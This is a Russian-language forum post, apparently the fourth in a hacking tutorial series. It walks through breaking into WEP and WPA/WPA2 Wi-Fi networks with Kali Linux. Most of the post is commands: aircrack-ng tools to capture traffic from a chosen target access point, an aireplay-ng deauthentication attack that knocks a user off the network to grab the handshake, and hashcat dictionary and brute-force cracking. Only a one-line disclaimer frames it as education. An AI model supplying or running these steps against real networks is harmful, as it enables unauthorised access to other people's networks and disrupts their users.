<Обучение от малого до великого> //Хакерство (Крэкерство) #4.
Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.
В данном уроке мы рассмотрим различные способы взлома защищённых WiFi точек при помощи дистрибутива Kali Linux.
Ниже описанные махинации не работают с Kali Linux'ом установленном на VirtualBox. Так что стоит либо сделать обычный установщик USB с Kali и от туда из режима live проворачивать данные действия (главное не забудьте скинуть все полученные файлы на основную машину, иначе они не сохранятся), либо установить на раздел жёсткого диска/целиком на жёсткий диск. Вы можете посмотреть подробную установку Kali в моих прошлых уроках.
Для справки:
()- в скобках будут уточнения.
""- в кавычках будут уточнения насчёт ввода чего-либо
... ...- отступления от темы для нужного уточнения
I) Технология защиты беспроводной сети WEP.
Совершенно не будет проблем получить доступ к данной сети. Можно сказать, что люди с WEP защитой просто дарят пароль. Соответственно такой защиты мало в настоящее время, но найти до сих пор можно. Начнём взлом.
root@571:~#iwconfig
root@571:~#airmon-ng start wlan0 (<- вводим сетевую карту в режим мониторинга)
root@571:~#iwconfig (проверяете, появилось ли новое значение)
root@571:~#airodump-ng wlan0mon (Появится таблица с нужными нам свойствами)
root@571:~#airodump-ng --bssid "Вставляем значение из столбца BSSID нужной нам (WEP) WiFi точки" --channel "Вставляем значение из столбца CH" -w /tmp/wep/ wlan0mon
... На данном моменте нужно ждать примерно 200.000 frames
Останавливаем процесс, когда frames накапали ...
root@571:~#cd /tmp/
root@571:~#ls -l (Просматриваете, есть ли файл wep-01.cap)
root@571:~#aircrack-ng wep-01.cap
... При нахождении нужного ключа появится надпись KEY FOUND!
Переписываете в блокнот последовательно все символы за исключение ":".
Должно получится что-то наподобие- 5R2IF4HG824F11YJ361743I2N8 (26 символов)
Далее подключаемся к роутеру без автоматики. У вас попросят ключ. Вставляете его и всё готово.
II) Технология защиты беспроводной сети WPA/WPA2
Данная защита ушла в лучшую сторону от старечка WEP, но всё равно остаётся уязвимой.
root@571:~#iwconfig
root@571:~#airmon-ng start wlan0 (<- вводим сетевую карту в режим мониторинга)
root@571:~#iwconfig (проверяете, появилось ли новое значение)
root@571:~#airodump-ng wlan0mon (Появится таблица с нужными нам свойствами)
root@571:~#airodump-ng --bssid "Вставляем значение из столбца BSSID нужной нам (WPA/WPA2) WiFi точки" --channel "Вставляем значение из столбца CH" -w /tmp/wep/ wlan0mon
... На данном моменте нужно ждать примерно 200.000 frames
Останавливаем процесс, когда frames накапали
И_Л_И
Если вы не хотите ждать, можете воспользоваться лёгкой альтернативой- деавторизировать пользователя в данной сети ...
root@571:~#aireplay-ng -0 1 -a "Вставляем значение из столбца BSSID нужной нам (WPA/WPA2) WiFi точки" -c "Вставляем значение из столбца STATION одного из пользователей данной сети для деавторизации" wlan0mon
root@571:~#cd /tmp/
root@571:~#ls -l (Просматриваете, есть ли файл wpa-01.cap)
root@571:~#aircrack-ng wpa-01.cap -J wpa-01.hccap
... Получаем файл wpa-01.hccap
Далее нужен уже соответственно подбирать по словарю получившиеся данные, либо брутфорсить.
1.1. Пример подбора по словарю:
hashcat -m 2500 /root/hs/wpa-01.hccap /root/rockyou.txt (rockyou.txt- это словарь часто всего встречаемых паролей, (http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2) весит он ~140Mb, в архиве ~60Mb)).
И просто соответственно ждёте пока не Kali не найдёт нужный вам пароль.
1.2. Второй вариант подбора по словарю (Windows):
Перекидываете файл на жёсткий диск Windows.
Скачиваете программу Hashcat. (https://hashcat.net/hashcat/)
Перекидываете файл .hccap и rockyou.txt в папку с .exe файлом hashcat.
Запускаете CMD от имени Администратора.
>cd Hashcat
>Hashcat64.exe -m 2500 wpa-01.hccap rockyou.txt
В итоге при успешном подборе получаем вкратце следующее:
DAP- "ненужные числа":"ненужные символы":"нужный пароль"
2. Пример работы брутфорса:
hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d (Но в этом есть минус, данный брутфорс лишь выводит числа без иных символов).
Надеюсь вам понравилось. В дальнейшем буду продолжать опубликовывать статьи по дистрибутиву Kali Linux.
Связаться со мной можно в ВК: https://vk.com/hydra571.
GNU/Linux
1.2K пост15.6K подписчика
Правила сообщества
Все дистрибутивы хороши.
Будьте людьми.